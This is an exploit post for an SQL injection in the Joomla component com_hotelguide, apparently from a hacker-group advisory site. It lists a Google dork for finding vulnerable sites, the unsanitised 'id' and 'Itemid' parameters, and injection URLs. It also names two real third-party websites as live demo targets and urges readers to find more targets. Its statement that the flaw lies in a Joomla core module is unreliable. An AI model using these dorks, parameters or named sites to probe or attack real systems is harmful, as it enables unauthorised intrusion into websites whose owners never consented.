#[+] Title: Exploit com_hotelguide Sql injection #[+] Product: Joomla #[+] Vendor: http://joomla.com #[+] Author : Dz MinD injector #[+] Facebook : https://www.facebook.com/Dz.MinD.Injector #[+] Type : proof of concept #[+] Tested on : Windows7 #[+] Date : 25/01/2016 ######## [ Proof / Exploit ] ################|=> #! Google Dork : #+ inurl:index.php?option=com_hotelguide #[+] Special Thanks : Howucan team #[+] Visit : http://howucan.gr/ Freedoom To Palastine <3 #########################[!] Description ################################## The SQL injection can enable an attacker to gain full administrative access to a target website when combined with other security weaknesses in Joomla! The SQL injection was discovered in a core module of Joomla! "Itemid=" & "id=" field in '/index.php?option=com_hotelguide&view=country&Itemid=' and '/index.php?option=com_hotelguide&view=city&id=' is not properly sanitized, that leads to SQL Injection Vulnerability. #########################[!] Proof Of Concept ################################## http://localhost/path/index.php?option=com_hotelguide&view=city&id='[ inject Here ] http://localhost/path//index.php?option=com_hotelguide&view=country&Itemid='[ inject Here ] ##Demo : http://www.agrituristabruzzo.it/index.php?option=com_hotelguide&view=city&id=34' http://www.stsitalia.it/index.php?option=com_hotelguide&view=country&Itemid=157' !+ Find More targets in Google ^_^ !+ Greetings to my Friends : Sige-Dz , Sami Joker , Vatou-Dz & All Algerian Hackerz !